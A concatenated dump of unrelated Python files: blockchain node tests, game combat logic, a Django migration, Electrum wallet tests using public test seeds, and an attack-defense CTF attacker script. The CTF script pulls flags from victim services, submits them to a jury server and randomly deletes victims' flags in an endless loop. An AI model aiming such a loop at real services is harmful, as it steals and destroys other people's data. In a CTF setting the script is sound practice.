for (expected_tx_index, gas_price) in [(3, 49), (4, 48), (5, 47), (6, 46)]:
tx = CTransaction()
tx.vin = [CTxIn(COutPoint(int(unspent['txid'], 16), unspent['vout']), nSequence=0)]
tx.vout = [
CTxOut(0, scriptPubKey=CScript([b"\x04", CScriptNum(30000), CScriptNum(gas_price), b"\x00", hex_str_to_bytes(contract_address), OP_CALL])),
CTxOut(int((unspent['amount'] - Decimal('0.1'))*COIN), scriptPubKey=CScript([OP_DUP, OP_HASH160, hex_str_to_bytes(p2pkh_to_hex_hash(address)), OP_EQUALVERIFY, OP_CHECKSIG]))
]
tx_raw = self.node.signrawtransaction(bytes_to_hex_str(tx.serialize()))['hex']
# Make the next vin refer to this tx.
unspent['amount'] -= Decimal('0.1')
unspent['txid'] = self.node.sendrawtransaction(tx_raw)
unspent['vout'] = 1
expected_tx_order.append((expected_tx_index, unspent['txid']))
old_block_count = self.node.getblockcount()
if with_restart:
self.restart_node()
block_hash = self.stake_or_mine(old_block_count=old_block_count, use_staking=use_staking)
block_txs = self.node.getblock(block_hash)['tx']
if use_staking:
block_txs.pop(1) # Ignore the coinstake tx so we can reuse the tests for both pow and pos
        # Even though the gas prices differ, since the ancestor txs must be included before their child txs we expect the order in which they were sent,
        # always choosing the tx with the highest gas price whose ancestors have already been included.
for (expected_tx_index, txid) in expected_tx_order:
assert_equal(block_txs[expected_tx_index], txid)
def run_test(self):
self.node.generate(500+COINBASE_MATURITY)
print("running pow tests")
self.verify_contract_txs_are_added_last_test()
self.verify_ancestor_chain_with_contract_txs_test()
self.verify_contract_txs_internal_order_test()
self.verify_contract_ancestor_txs_test()
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
# Redo the testing and check that the mempool is correctly ordered after a restart
print("running pow tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True)
self.verify_contract_txs_internal_order_test(with_restart=True)
self.verify_contract_ancestor_txs_test(with_restart=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests")
self.verify_contract_txs_are_added_last_test(use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(use_staking=True)
self.verify_contract_txs_internal_order_test(use_staking=True)
self.verify_contract_ancestor_txs_test(use_staking=True)
# Verify that the mempool is empty before running more tests
assert_equal(self.node.getrawmempool(), [])
print("running pos tests with restart")
self.verify_contract_txs_are_added_last_test(with_restart=True, use_staking=True)
self.verify_ancestor_chain_with_contract_txs_test(with_restart=True, use_staking=True)
self.verify_contract_txs_internal_order_test(with_restart=True, use_staking=True)
self.verify_contract_ancestor_txs_test(with_restart=True, use_staking=True)
if __name__ == '__main__':
QtumTransactionPrioritizationTest().main()
|
py | 1a38c513ef252cbcb654ac45b85cf1eb7f9ed284 | from app.engine.combat.solver import CombatPhaseSolver
from app.engine import skill_system, item_system
from app.engine.game_state import game
from app.engine.combat.simple_combat import SimpleCombat
from app.engine.objects.unit import UnitObject
from app.engine.objects.item import ItemObject
class BaseCombat(SimpleCombat):
alerts: bool = True
"""
    Handles the "use" of items in the base and prep screens
"""
def __init__(self, attacker: UnitObject, main_item: ItemObject,
main_target: UnitObject, script):
self.attacker = attacker
self.defender = main_target
self.main_item = main_item
self.def_item = None
if self.defender:
self.def_item = self.defender.get_weapon()
self.state_machine = CombatPhaseSolver(
self.attacker, self.main_item, [self.main_item],
[self.defender], [[]], [self.defender.position],
self.defender, self.def_item, script)
self.full_playback = []
self.playback = []
self.actions = []
self.start_combat()
while self.state_machine.get_state():
self.actions, self.playback = self.state_machine.do()
self.full_playback += self.playback
self._apply_actions()
self.state_machine.setup_next_state()
def start_combat(self):
game.events.trigger('combat_start', self.attacker, self.defender, self.main_item, self.attacker.position)
skill_system.pre_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.pre_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.start_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.start_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def cleanup_combat(self):
skill_system.cleanup_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.cleanup_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def end_combat(self):
skill_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
item_system.end_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
if self.def_item:
item_system.end_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
skill_system.post_combat(self.full_playback, self.attacker, self.main_item, self.defender, 'attack')
if self.attacker is not self.defender:
skill_system.post_combat(self.full_playback, self.defender, self.def_item, self.attacker, 'defense')
def _all_units(self) -> list:
"""
        Returns a list of all units taking part in this combat
"""
all_units = [self.attacker]
if self.attacker is not self.defender:
all_units.append(self.defender)
return all_units
def handle_state_stack(self):
pass
|
py | 1a38c52897706d497aafa5b9bb0faa4e0f823dc5 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(S, a, b):
    # Returns 0 if exactly one of the two opposing directions appears in S,
    # 1 otherwise (both present or both absent).
    if (a in S) and (b not in S):
        return 0
    if (b in S) and (a not in S):
        return 0
    return 1
def main():
S = str(input())
flag = 1
for a,b in [['N','S'],['E','W']]:
flag = min(check(S,a,b),flag)
if flag==1:
print('Yes')
else:
print('No')
if __name__ == '__main__':
main() |
py | 1a38c5666d4aff5204cfddf2e7902797ca12a1c7 | import subprocess
from .browser_ui import write_browser_ui
from .platform_detect import get_os_dir
filename = write_browser_ui()
os_dir = get_os_dir()
if os_dir.startswith("Ubuntu"):
subprocess.Popen(['xdg-open %s' % filename], shell=True)
else:
subprocess.Popen(['open %s' % filename], shell=True)
|
py | 1a38c66082a45a4ae76f033f462220530b4606d3 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import socket
import time
import sys
import random
import traceback
def send_flag(your_teamnum, jury_hostport, flag):
url = 'http://' + jury_hostport + '/flag?teamid=' + str(your_teamnum) + '&flag=' + flag
try:
r = requests.get(url)
print("Try send flag " + flag)
if r.status_code != 200:
print("FAIL")
print(r.text)
else:
print("OK!!!!")
except Exception as ex:
print("Could not connect to jury " + url + str(ex))
except SystemExit:
pass
def delete_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("delete\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
s.recv(1024)
s.close()
except socket.timeout:
print("Error(1) in delete_flag socket.timeout")
traceback.print_exc()
exit(509)
except socket.error as serr:
print("Error(2) in delete_flag " + str(serr))
traceback.print_exc()
exit(508)
except Exception as e:
print("Error(3) in delete_flag " + str(e))
traceback.print_exc()
exit(507)
return ''
def get_flag(ip_address, port, flag_id):
try:
# print("try connect " + host + ":" + str(port))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("get\n".encode("utf-8"))
s.recv(1024)
s.send((flag_id + "\n").encode("utf-8"))
result = s.recv(1024)
result = result.decode("utf-8", "ignore")
flag2 = result.strip()
flag2 = flag2.split("FOUND FLAG: ")
if len(flag2) == 2:
flag2 = flag2[1]
else:
flag2 = ''
s.close()
return flag2
except socket.timeout:
print("Error(1) in get_flag socket.timeout")
traceback.print_exc()
exit(500)
except socket.error as serr:
print("Error(2) in get_flag " + str(serr))
traceback.print_exc()
exit(501)
except Exception as e:
print("Error(3) in get_flag " + str(e))
traceback.print_exc()
exit(502)
return ''
def start_attack(your_teamnum, jury_hostport, ip_address, port):
print("Start attack to (" + ip_address + ":" + str(port) + ")")
flag_ids = []
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((ip_address, port))
s.recv(1024)
s.send("list\n".encode("utf-8"))
result = ""
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
while result1.strip() != "":
result1 = s.recv(1024)
result1 = result1.decode("utf-8", "ignore")
if result1.strip() == "":
break
result = result + result1
s.close()
result = result.split('\n')
for i in result:
flag_id = i.split(":")
if len(flag_id) > 1:
flag_id = flag_id[1].strip()
flag_ids.append(flag_id)
except socket.timeout:
print("Socket timeout")
traceback.print_exc()
exit(504)
except socket.error as serr:
print("Error in start_attack: " + str(serr))
traceback.print_exc()
exit(505)
except Exception as e:
print("Error in start_attack: " + str(e))
traceback.print_exc()
exit(506)
for flag_id in flag_ids:
flag = get_flag(ip_address, port, flag_id)
print(flag_id + ": " + flag)
if flag != '':
send_flag(your_teamnum, jury_hostport, flag)
        # randomly delete the flag about half the time
n = random.randint(1,100)
if n < 50:
delete_flag(ip_address, port, flag_id)
# flag = str(uuid.uuid4())
# send_flag(your_teamnum, jury_host, jury_port, flag)
jury_hostport = sys.argv[1]
your_teamnum = sys.argv[2]
attack_hosts = sys.argv[3]
attack_hosts = attack_hosts.split(",")
print(attack_hosts)
while True:
print(" =============== ")
for hostport in attack_hosts:
victum_host = hostport.split(":")[0]
victum_port = int(hostport.split(":")[1])
start_attack(your_teamnum, jury_hostport, victum_host, victum_port)
print(hostport)
t = random.randint(1,60)
print("wait " + str(t) + " sec")
time.sleep(t) # wait t seconds before attack |
py | 1a38c6a55606545d54c19fa1647b61cbf281b252 | # Generated by Django 2.2 on 2019-04-30 16:28
from django.db import migrations
import wagtail.core.blocks
import wagtail.core.fields
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [("core", "0013_auto_20190430_0308")]
operations = [
migrations.AlterField(
model_name="articlepage",
name="body",
field=wagtail.core.fields.StreamField(
[
("paragraph", wagtail.core.blocks.RichTextBlock()),
(
"photo",
wagtail.core.blocks.StructBlock(
[
("image", wagtail.images.blocks.ImageChooserBlock()),
(
"caption",
wagtail.core.blocks.RichTextBlock(
features=["italic"], required=False
),
),
(
"size",
wagtail.core.blocks.ChoiceBlock(
choices=[
("small", "Small"),
("medium", "Medium"),
("large", "Large"),
],
help_text="Width of image in article.",
),
),
]
),
),
(
"photo_gallery",
wagtail.core.blocks.ListBlock(
wagtail.core.blocks.StructBlock(
[
(
"image",
wagtail.images.blocks.ImageChooserBlock(),
),
(
"caption",
wagtail.core.blocks.RichTextBlock(
features=["italic"], required=False
),
),
]
),
icon="image",
),
),
(
"embed",
wagtail.core.blocks.StructBlock(
[
(
"embed",
wagtail.embeds.blocks.EmbedBlock(
help_text="URL to the content to embed."
),
)
]
),
),
],
blank=True,
),
),
migrations.AlterField(
model_name="staticpage",
name="body",
field=wagtail.core.fields.RichTextField(blank=True, null=True),
),
]
|
py | 1a38c781e059c79954a2e365afb8d9e18a3ee805 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 22 21:41:21 2018
@author: Kazuki
"""
import pandas as pd
# =============================================================================
# LB804
# =============================================================================
def load_train_LB804():
return pd.read_feather('../data/X_train_LB0.804.f')
def load_test_LB804():
return pd.read_feather('../data/X_test_LB0.804.f')
def load_cat_LB804():
return ['f108_NAME_GOODS_CATEGORY', 'f002_WEEKDAY_APPR_PROCESS_START',
'f109_NAME_GOODS_CATEGORY', 'f108_NAME_TYPE_SUITE', 'f109_PRODUCT_COMBINATION',
'f002_NAME_FAMILY_STATUS', 'f002_OCCUPATION_TYPE', 'f108_PRODUCT_COMBINATION',
'f510_CREDIT_TYPE', 'f002_WALLSMATERIAL_MODE', 'f002_NAME_INCOME_TYPE',
'f002_NAME_EDUCATION_TYPE', 'f002_ORGANIZATION_TYPE', 'f509_CREDIT_TYPE']
# =============================================================================
# LB806
# =============================================================================
def load_train_LB806():
return pd.read_pickle('../feature_someone/0727/20180727_train_rk.pkl')
def load_test_LB806():
return pd.read_pickle('../feature_someone/0727/20180727_test_rk.pkl')
def load_cat_LB806():
        return ['FLAG_DOCUMENT_PATTERN', 'FLAG_OWN_CAR', 'FLAG_OWN_REALTY',
                'FONDKAPREMONT_MODE', 'HOUSETYPE_MODE', 'NAME_CONTRACT_TYPE',
                'NAME_EDUCATION_TYPE', 'NAME_FAMILY_STATUS', 'NAME_HOUSING_TYPE',
                'NAME_INCOME_TYPE', 'NAME_TYPE_SUITE', 'OCCUPATION_TYPE',
                'WALLSMATERIAL_MODE', 'WEEKDAY_APPR_PROCESS_START']
# =============================================================================
# LB806
# =============================================================================
def load_train_CV805_LB803():
return pd.read_pickle('../data/X_train_CV805_LB803.pkl.gz')
def load_test_CV805_LB803():
return pd.read_pickle('../data/X_test_CV805_LB803.pkl.gz')
def load_cat_CV805_LB803():
return ['f108_PRODUCT_COMBINATION', 'f002_WALLSMATERIAL_MODE', 'f002_NAME_EDUCATION_TYPE',
'f109_NAME_GOODS_CATEGORY', 'f002_ORGANIZATION_TYPE', 'f108_NAME_GOODS_CATEGORY',
'f002_NAME_INCOME_TYPE', 'f002_NAME_FAMILY_STATUS', 'f002_WEEKDAY_APPR_PROCESS_START',
'f002_OCCUPATION_TYPE', 'f109_PRODUCT_COMBINATION', 'f108_NAME_TYPE_SUITE']
class Loader:
def __init__(self, name):
"""
LB804
LB806
CV805_LB803
"""
if name not in ['LB804', 'LB806', 'CV805_LB803']:
raise Exception(name)
self.name = name
def train(self):
if self.name == 'LB804':
return load_train_LB804()
elif self.name == 'LB806':
return load_train_LB806()
elif self.name == 'CV805_LB803':
return load_train_CV805_LB803()
else:
raise Exception(self.name)
def test(self):
if self.name == 'LB804':
return load_test_LB804()
elif self.name == 'LB806':
return load_test_LB806()
elif self.name == 'CV805_LB803':
return load_test_CV805_LB803()
else:
raise Exception(self.name)
def category(self):
if self.name == 'LB804':
return load_cat_LB804()
elif self.name == 'LB806':
return load_cat_LB806()
elif self.name == 'CV805_LB803':
return load_cat_CV805_LB803()
else:
raise Exception(self.name)
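
# A minimal usage sketch (assumed; the feather/pickle files referenced by the
# loaders above must exist under ../data/ and ../feature_someone/):
#     loader = Loader('LB804')
#     X_train = loader.train()
#     X_test = loader.test()
#     categorical_cols = loader.category()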
|
py | 1a38c81d2a380e5904dc9997bc6452aee99926f4 | """ Starts the protonfix module
"""
import os
import sys
from . import fix
if 'DEBUG' in os.environ:
from . import debug
if 'STEAM_COMPAT_DATA_PATH' in os.environ:
fix.main()
|
py | 1a38c9223040ce251056ae8989005e509cbad781 | import unittest
from unittest import mock
import shutil
import tempfile
from typing import Sequence
from electrum import storage, bitcoin, keystore, constants
from electrum import Transaction
from electrum import SimpleConfig
from electrum.address_synchronizer import TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT
from electrum.wallet import sweep, Multisig_Wallet, Standard_Wallet, Imported_Wallet
from electrum.util import bfh, bh2u
from electrum.transaction import TxOutput
from electrum.plugins.trustedcoin import trustedcoin
from . import TestCaseForTestnet
from . import SequentialTestCase
from .test_bitcoin import needs_test_with_all_ecc_implementations
_UNICODE_HORROR_HEX = 'e282bf20f09f988020f09f98882020202020e3818620e38191e3819fe381be20e3828fe3828b2077cda2cda2cd9d68cda16fcda2cda120ccb8cda26bccb5cd9f6eccb4cd98c7ab77ccb8cc9b73cd9820cc80cc8177cd98cda2e1b8a9ccb561d289cca1cda27420cca7cc9568cc816fccb572cd8fccb5726f7273cca120ccb6cda1cda06cc4afccb665cd9fcd9f20ccb6cd9d696ecda220cd8f74cc9568ccb7cca1cd9f6520cd9fcd9f64cc9b61cd9c72cc95cda16bcca2cca820cda168ccb465cd8f61ccb7cca2cca17274cc81cd8f20ccb4ccb7cda0c3b2ccb5ccb666ccb82075cca7cd986ec3adcc9bcd9c63cda2cd8f6fccb7cd8f64ccb8cda265cca1cd9d3fcd9e'
UNICODE_HORROR = bfh(_UNICODE_HORROR_HEX).decode('utf-8')
# (the decoded value is a deliberately nasty mix of currency signs, emoji, CJK
# text and stacked combining characters; see _UNICODE_HORROR_HEX above)
class WalletIntegrityHelper:
gap_limit = 1 # make tests run faster
@classmethod
def check_seeded_keystore_sanity(cls, test_obj, ks):
test_obj.assertTrue(ks.is_deterministic())
test_obj.assertFalse(ks.is_watching_only())
test_obj.assertFalse(ks.can_import())
test_obj.assertTrue(ks.has_seed())
@classmethod
def check_xpub_keystore_sanity(cls, test_obj, ks):
test_obj.assertTrue(ks.is_deterministic())
test_obj.assertTrue(ks.is_watching_only())
test_obj.assertFalse(ks.can_import())
test_obj.assertFalse(ks.has_seed())
@classmethod
def create_standard_wallet(cls, ks, gap_limit=None):
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
store.put('keystore', ks.dump())
store.put('gap_limit', gap_limit or cls.gap_limit)
w = Standard_Wallet(store)
w.synchronize()
return w
@classmethod
def create_imported_wallet(cls, privkeys=False):
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
if privkeys:
k = keystore.Imported_KeyStore({})
store.put('keystore', k.dump())
w = Imported_Wallet(store)
return w
@classmethod
def create_multisig_wallet(cls, keystores: Sequence, multisig_type: str, gap_limit=None):
"""Creates a multisig wallet."""
store = storage.WalletStorage('if_this_exists_mocking_failed_648151893')
for i, ks in enumerate(keystores):
cosigner_index = i + 1
store.put('x%d/' % cosigner_index, ks.dump())
store.put('wallet_type', multisig_type)
store.put('gap_limit', gap_limit or cls.gap_limit)
w = Multisig_Wallet(store)
w.synchronize()
return w
class TestWalletKeystoreAddressIntegrityForMainnet(SequentialTestCase):
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_standard(self, mock_write):
seed_words = 'cycle rocket west magnet parrot shuffle foot correct salt library feed song'
self.assertEqual(bitcoin.seed_type(seed_words), 'standard')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9s21ZrQH143K32jECVM729vWgGq4mUDJCk1ozqAStTphzQtCTuoFmFafNoG1g55iCnBTXUzz3zWnDb5CVLGiFvmaZjuazHDL8a81cPQ8KL6')
self.assertEqual(ks.xpub, 'xpub661MyMwAqRbcFWohJWt7PHsFEJfZAvw9ZxwQoDa4SoMgsDDM1T7WK3u9E4edkC4ugRnZ8E4xDZRpk8Rnts3Nbt97dPwT52CwBdDWroaZf8U')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1NNkttn1YvVGdqBW4PR6zvc3Zx3H5owKRf')
self.assertEqual(w.get_change_addresses()[0], '1KSezYMhAJMWqFbVFB2JshYg69UpmEXR4D')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_segwit(self, mock_write):
seed_words = 'bitter grass shiver impose acquire brush forget axis eager alone wine silver'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAZswDvNeJeha8qZ8g7efN3FXYVJLaEUsE9TW6qXDEbVe74AZ75c2sZFZXPNFzxnhChDQ89oC8C5AjWwHmH1HeRKE1c4kKBQAmjUDdKDUZw2')
self.assertEqual(ks.xpub, 'zpub6nsHdRuY92FsMKdbn9BfjBCG6X8pyhCibNP6uDvpnw2cyrVhecvHRMa3Ne8kdJZxjxgwnpbHLkcR4bfnhHy6auHPJyDTQ3kianeuVLdkCYQ')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1q3g5tmkmlvxryhh843v4dz026avatc0zzr6h3af')
self.assertEqual(w.get_change_addresses()[0], 'bc1qdy94n2q5qcp0kg7v9yzwe6wvfkhnvyzje7nx2p')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_segwit_passphrase(self, mock_write):
seed_words = 'bitter grass shiver impose acquire brush forget axis eager alone wine silver'
self.assertEqual(bitcoin.seed_type(seed_words), 'segwit')
ks = keystore.from_seed(seed_words, UNICODE_HORROR, False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAZDmEQiCLUcZXPfrBXoksCD2R6RMAzAre7SUyBotibisy9c7vGhLYvHaP3d9rYU12DKAWdZfscPNA7qEPgTkCDqX5sE93ryAJAQvkDbfLxU')
self.assertEqual(ks.xpub, 'zpub6nD7dvF6ArArjskKHZLmEL9ky8FqaSti1LN5maDWGwFrqwwGTp1b6ic4EHwciFNaYDmCXcQYxXSiF9BjcLCMPcaYkVN2nQD6QjYQ8vpSR3Z')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
self.assertEqual(w.get_receiving_addresses()[0], 'bc1qx94dutas7ysn2my645cyttujrms5d9p57f6aam')
self.assertEqual(w.get_change_addresses()[0], 'bc1qcywwsy87sdp8vz5rfjh3sxdv6rt95kujdqq38g')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_old(self, mock_write):
seed_words = 'powerful random nobody notice nothing important anyway look away hidden message over'
self.assertEqual(bitcoin.seed_type(seed_words), 'old')
ks = keystore.from_seed(seed_words, '', False)
WalletIntegrityHelper.check_seeded_keystore_sanity(self, ks)
self.assertTrue(isinstance(ks, keystore.Old_KeyStore))
self.assertEqual(ks.mpk, 'e9d4b7866dd1e91c862aebf62a49548c7dbf7bcc6e4b7b8c9da820c7737968df9c09d5a3e271dc814a29981f81b3faaf2737b551ef5dcc6189cf0f8252c442b3')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1FJEEB8ihPMbzs2SkLmr37dHyRFzakqUmo')
self.assertEqual(w.get_change_addresses()[0], '1KRW8pH6HFHZh889VDq6fEKvmrsmApwNfe')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_electrum_seed_2fa(self, mock_write):
seed_words = 'kiss live scene rude gate step hip quarter bunker oxygen motor glove'
self.assertEqual(bitcoin.seed_type(seed_words), '2fa')
xprv1, xpub1, xprv2, xpub2 = trustedcoin.TrustedCoinPlugin.xkeys_from_seed(seed_words, '')
ks1 = keystore.from_xprv(xprv1)
self.assertTrue(isinstance(ks1, keystore.BIP32_KeyStore))
self.assertEqual(ks1.xprv, 'xprv9uraXy9F3HP7i8QDqwNTBiD8Jf4bPD4Epif8cS8qbUbgeidUesyZpKmzfcSeHutsGfFnjgih7kzwTB5UQVRNB5LoXaNc8pFusKYx3KVVvYR')
self.assertEqual(ks1.xpub, 'xpub68qvwUg8sewQvcUgwxuTYr9rrgu5nfn6BwajQpYT9p8fXWxdCRHpN86UWruWJAD1ede8Sv8ERrTa22Gyc4SBfm7zFpcyoVWVBKCVwnw6s1J')
self.assertEqual(ks1.xpub, xpub1)
ks2 = keystore.from_xprv(xprv2)
self.assertTrue(isinstance(ks2, keystore.BIP32_KeyStore))
self.assertEqual(ks2.xprv, 'xprv9uraXy9F3HP7kKSiRAvLV7Nrjj7YzspDys7dvGLLu4tLZT49CEBxPWp88dHhVxvZ69SHrPQMUCWjj4Ka2z9kNvs1HAeEf3extGGeSWqEVqf')
self.assertEqual(ks2.xpub, 'xpub68qvwUg8sewQxoXBXCTLrFKbHkx3QLY5M63EiejxTQRKSFPHjmWCwK8byvZMM2wZNYA3SmxXoma3M1zxhGESHZwtB7SwrxRgKXAG8dCD2eS')
self.assertEqual(ks2.xpub, xpub2)
long_user_id, short_id = trustedcoin.get_user_id(
{'x1/': {'xpub': xpub1},
'x2/': {'xpub': xpub2}})
xpub3 = trustedcoin.make_xpub(trustedcoin.get_signing_xpub(), long_user_id)
ks3 = keystore.from_xpub(xpub3)
WalletIntegrityHelper.check_xpub_keystore_sanity(self, ks3)
self.assertTrue(isinstance(ks3, keystore.BIP32_KeyStore))
w = WalletIntegrityHelper.create_multisig_wallet([ks1, ks2, ks3], '2of3')
self.assertEqual(w.txin_type, 'p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35L8XmCDoEBKeaWRjvmZvoZvhp8BXMMMPV')
self.assertEqual(w.get_change_addresses()[0], '3PeZEcumRqHSPNN43hd4yskGEBdzXgY8Cy')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip44_standard(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/44'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9zGLcNEb3cHUKizLVBz6RYeE9bEZAVPjH2pD1DEzCnPcsemWc3d3xTao8sfhfUmDLMq6e3RcEMEvJG1Et8dvfL8DV4h7mwm9J6AJsW9WXQD')
self.assertEqual(ks.xpub, 'xpub6DFh1smUsyqmYD4obDX6ngaxhd53Zx7aeFjoobebm7vbkT6f9awJWFuGzBT9FQJEWFBL7UyhMXtYzRcwDuVbcxtv9Ce2W9eMm4KXLdvdbjv')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '16j7Dqk3Z9DdTdBtHcCVLaNQy9MTgywUUo')
self.assertEqual(w.get_change_addresses()[0], '1GG5bVeWgAp5XW7JLCphse14QaC4qiHyWn')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip44_standard_passphrase(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, UNICODE_HORROR, "m/44'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'xprv9z8izheguGnLopSqkY7GcGFrP2Gu6rzBvvHo6uB9B8DWJhsows6WDZAsbBTaP3ncP2AVbTQphyEQkahrB9s1L7ihZtfz5WGQPMbXwsUtSik')
self.assertEqual(ks.xpub, 'xpub6D85QDBajeLe2JXJrZeGyQCaw47PWKi3J9DPuHakjTkVBWCxVQQkmMVMSSfnw39tj9FntbozpRtb1AJ8ubjeVSBhyK4M5mzdvsXZzKPwodT')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2pkh')
self.assertEqual(w.get_receiving_addresses()[0], '1F88g2naBMhDB7pYFttPWGQgryba3hPevM')
self.assertEqual(w.get_change_addresses()[0], '1H4QD1rg2zQJ4UjuAVJr5eW1fEM8WMqyxh')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip49_p2sh_segwit(self, mock_write):
seed_words = 'treat dwarf wealth gasp brass outside high rent blood crowd make initial'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/49'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'yprvAJEYHeNEPcyBoQYM7sGCxDiNCTX65u4ANgZuSGTrKN5YCC9MP84SBayrgaMyZV7zvkHrr3HVPTK853s2SPk4EttPazBZBmz6QfDkXeE8Zr7')
self.assertEqual(ks.xpub, 'ypub6XDth9u8DzXV1tcpDtoDKMf6kVMaVMn1juVWEesTshcX4zUVvfNgjPJLXrD9N7AdTLnbHFL64KmBn3SNaTe69iZYbYCqLCCNPZKbLz9niQ4')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh-p2sh')
self.assertEqual(w.get_receiving_addresses()[0], '35ohQTdNykjkF1Mn9nAVEFjupyAtsPAK1W')
self.assertEqual(w.get_change_addresses()[0], '3KaBTcviBLEJajTEMstsA2GWjYoPzPK7Y7')
@needs_test_with_all_ecc_implementations
@mock.patch.object(storage.WalletStorage, '_write')
def test_bip39_seed_bip84_native_segwit(self, mock_write):
# test case from bip84
seed_words = 'abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about'
self.assertEqual(keystore.bip39_is_checksum_valid(seed_words), (True, True))
ks = keystore.from_bip39_seed(seed_words, '', "m/84'/0'/0'")
self.assertTrue(isinstance(ks, keystore.BIP32_KeyStore))
self.assertEqual(ks.xprv, 'zprvAdG4iTXWBoARxkkzNpNh8r6Qag3irQB8PzEMkAFeTRXxHpbF9z4QgEvBRmfvqWvGp42t42nvgGpNgYSJA9iefm1yYNZKEm7z6qUWCroSQnE')
self.assertEqual(ks.xpub, 'zpub6rFR7y4Q2AijBEqTUquhVz398htDFrtymD9xYYfG1m4wAcvPhXNfE3EfH1r1ADqtfSdVCToUG868RvUUkgDKf31mGDtKsAYz2oz2AGutZYs')
w = WalletIntegrityHelper.create_standard_wallet(ks)
self.assertEqual(w.txin_type, 'p2wpkh')
